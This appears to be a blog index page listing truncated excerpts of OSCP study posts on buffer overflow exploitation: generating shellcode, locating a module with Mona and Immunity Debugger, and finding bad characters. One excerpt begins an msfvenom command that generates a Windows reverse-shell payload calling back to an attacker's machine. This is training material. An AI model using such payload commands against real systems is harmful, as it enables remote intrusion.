摘要: OSCP Security Technology - Generating Shellcode& Gaining Root Generating shellcode.(Note: LHOST is Kali Linux's IP) msfvenom -p windows/shell_reverse_ 阅读全文
posted @ 2021-06-27 20:29 晨风_Eric 阅读(46) 评论(0) 推荐(0) 编辑
摘要: OSCP Security Technology - Finding the Right Module Download Mona module and set immunity debugger configuration. https://github.com/corelan/mona Open 阅读全文
posted @ 2021-06-27 19:44 晨风_Eric 阅读(51) 评论(0) 推荐(0) 编辑
摘要: OSCP Security Technology - Finding Bad Characters Finding bad characters with immunity debugger. nano badchars.py chmod 777 badchars.py #!/usr/bin/pyt 阅读全文
posted @ 2021-06-27 18:55 晨风_Eric 阅读(89) 评论(0) 推荐(0) 编辑